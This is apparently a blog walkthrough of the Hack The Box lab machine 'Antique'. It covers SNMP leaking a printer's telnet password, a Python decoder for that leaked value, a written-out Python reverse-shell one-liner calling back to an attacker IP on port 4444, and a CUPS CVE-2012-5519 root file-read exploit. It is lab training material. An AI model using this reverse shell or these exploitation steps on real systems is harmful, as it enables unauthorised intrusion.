HTB : Antique writeup

Antique machine HTB

Antique is an easy-level machine and the second challenge in HTB's Printer Exploitation track.

Enumeration
Starting with the usual nmap scan, we get the following:

```text
┌──(kali㉿kali)-[~/htb/tracks/Printer-Exploitation/Antique]
└─$ nmap -sC -sV 10.129.254.15
...
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
```

The Telnet service is accessible, but it requires further investigation.
Next, let's run a UDP scan to check for any open UDP services.

```text
┌──(kali㉿kali)-[~/htb/tracks/Printer-Exploitation/Antique]
└─$ nmap -sU 10.129.254.15
...
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
```

The Simple Network Management Protocol (SNMP) is running on the target machine. This protocol is commonly used for network monitoring and device management, and here it is SNMPv1 with the default "public" community string. Let's go ahead and enumerate it!

SNMP Enumeration

Let's enumerate the SNMP service for useful information using Metasploit. Fire up msfconsole and search for SNMP enumeration modules:
[screenshot: msfconsole search results]
From the list, I chose module 7 (auxiliary/scanner/snmp/snmp_enum) to proceed, but unfortunately the scan retrieved no significant information. So I went back to investigate the open Telnet port.

Investigating Telnet
Since the SNMP scan didn't yield results, we return to the Telnet service.
[screenshot: telnet connection banner]
Connecting with Telnet reveals that a password is required. However, the banner also shows the device name: HP JetDirect.
This indicates the target is likely a printer device. A quick search for known vulnerabilities related to HP JetDirect reveals several CVEs.

Clicking the first link (CVEDetails.com) and going through the CVEs, this one matches our case.
[screenshot: CVE entry]
I looked it up on Exploit-DB and found a description of the attack vector.
[screenshot: Exploit-DB entry]
However, the tool used in that example is an .exe, and the Linux version is written in Java as well.

This blog is not a safe place for java.

Exploiting SNMP for Password Retrieval
A quick search for 'SNMP tools that send get requests' led me to snmpget, which comes pre-installed on Kali Linux.
[screenshot: snmpget output]
And we did receive the encoded device password; we can quickly decode it in our terminal!

```text
┌──(kali㉿kali)-[~/htb/tracks/Printer-Exploitation/Antique]
└─$ echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135 " | xxd -r -p

P@ssw0rd@123!!123�q��"2Rbs3CSs��$4�Eu�WGW�(8i IY�aA�"1&1A5
```
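The garbage after the password in that output is not part of the secret. net-snmp prints a value of type BITS as the hex bytes followed by the decimal indices of every set bit (0x50 has bits 1 and 3 set, 0x40 adds bit 9, and so on), and `xxd -r -p` swallowed those decimal indices as if they were more hex. The following Python is an added example, not part of the original writeup or of any tool it mentions: it splits a `BITS:` line at the one point where the index list agrees with the bytes, decodes only the real bytes, and also reproduces the xxd-style mistake for comparison. The hex bytes and bit indices are the ones shown above; the OID in front is a placeholder. From a defensive point of view the lesson is the same either way: an SNMPv1 agent with the default community string hands this configuration to anyone who asks, so the community string, SNMP version and reachability of UDP/161 are what to fix.

```python
import re
import string

# Sample snmpget output line. The hex bytes and the bit-index list are the
# ones shown in the writeup; the OID in front is a placeholder, not the
# OID queried on the box.
SAMPLE_LINE = (
    "OID-PLACEHOLDER = BITS: "
    "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 "
    "1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 "
    "54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 "
    "119 122 123 126 130 131 134 135"
)

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")
DECIMAL = re.compile(r"^\d+$")


def set_bit_indices(data):
    """Indices of the set bits in `data`, numbered MSB-first within each byte,
    which is how SNMP BITS values are counted (bit 0 is the high bit of byte 0)."""
    return [i * 8 + b for i, byte in enumerate(data)
            for b in range(8) if byte & (0x80 >> b)]


def parse_bits_value(line):
    """Recover the raw octets from a net-snmp 'BITS:' line.

    net-snmp prints a BITS value as the hex bytes followed by the decimal
    indices of every set bit. The two runs cannot be told apart by shape
    alone (a bit index such as 17 also looks like a hex byte), so we try
    each split point and keep the one where the index list is exactly the
    list implied by the bytes.
    """
    if "BITS:" not in line:
        raise ValueError("not a BITS value")
    tokens = line.split("BITS:", 1)[1].split()
    for k in range(len(tokens), -1, -1):          # longest hex prefix first
        head, tail = tokens[:k], tokens[k:]
        if not all(HEX_BYTE.match(t) for t in head):
            continue
        if not all(DECIMAL.match(t) for t in tail):
            continue
        data = bytes(int(t, 16) for t in head)
        if [int(t) for t in tail] == set_bit_indices(data):
            return data
    raise ValueError("hex bytes and bit-index list do not agree")


def printable_prefix(data):
    """Decode the leading run of printable, non-control ASCII and stop at the
    first byte that is not; a password stored as a plain string ends there."""
    out = []
    for byte in data:
        ch = chr(byte)
        if ch not in string.printable or ch in "\t\n\r\x0b\x0c":
            break
        out.append(ch)
    return "".join(out)


def recover_password(line):
    """What the xxd one-liner on the page was trying to do, done on the right bytes."""
    return printable_prefix(parse_bits_value(line))


def xxd_style_decode(line):
    """Reproduce the page's mistake: feed every token after 'BITS:' to a hex
    decoder, so the decimal bit indices are read as hex digits too and turn
    into the trailing garbage seen in the writeup."""
    digits = "".join(line.split("BITS:", 1)[1].split())
    digits = "".join(c for c in digits if c in string.hexdigits)
    if len(digits) % 2:                # drop a dangling half byte so fromhex accepts it
        digits = digits[:-1]
    return bytes.fromhex(digits)


if __name__ == "__main__":
    print("correct decode :", recover_password(SAMPLE_LINE))
    print("xxd-style bytes:", xxd_style_decode(SAMPLE_LINE))
```

On the sample line the consistent split is after the 17th byte, which decodes cleanly to the 17-character password, while the xxd-style decode yields 75 bytes, the same prefix followed by 58 bytes of noise.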

Connecting via Telnet
Now that we have the password, we connect to the Telnet service.
[screenshot: telnet login]
After logging in, we can execute commands using the exec syntax. To gain shell access, I used a reverse shell payload:

Payload:

```text
exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.120",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("sh")'
```

But before we run it, we have to set up our listener by simply typing:

```text
rlwrap nc -lvnp 4444
```

[screenshot: listener catching the shell]

&amp; that's it! We're in!

Before getting into privilege escalation, let's upgrade our shell with Python for better interactivity.
[screenshot: shell upgrade]
Privilege Escalation

At first I tried putting a reverse shell in the telnet.py file in the hope of it getting executed as root; it didn't.

I also ran `ps aux` to display all running processes, but I didn't find anything interesting there either.

Then I went to check what services are running on the server with `netstat -nat`.

[screenshot: netstat output]
As we can see, there is a listener bound locally on port 631. Let's curl it and see what we get.
[screenshot: curl output]
Hm, our target server is running CUPS/1.6. Another quick search for a CUPS/1.6 CVE turned up, as the first link, a GitHub repo with an exploit: https://github.com/p1ckzi/CVE-2012-5519.

We're almost there, yay!

Next, I cloned the repo and started my Python HTTP server so I could upload the .sh file to the target.

```text
┌──(kali㉿kali)-[~/…/tracks/Printer-Exploitation/Antique/CVE-2012-5519]
└─$ ls
cups-root-file-read.sh  README.md

┌──(kali㉿kali)-[~/…/tracks/Printer-Exploitation/Antique/CVE-2012-5519]
└─$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

[screenshot: fetching the script on the target]
Now let's give the file execute permission with `chmod +x cups.sh` and then run it.
[screenshot: script output]
That's it :) We owned the box, yay! :D


Source: HTB : Antique writeup, https://stortny.github.io/blog/2024/12/28/HackTheBox-Antique-writeup/
Author: stortny
Posted on: December 28, 2024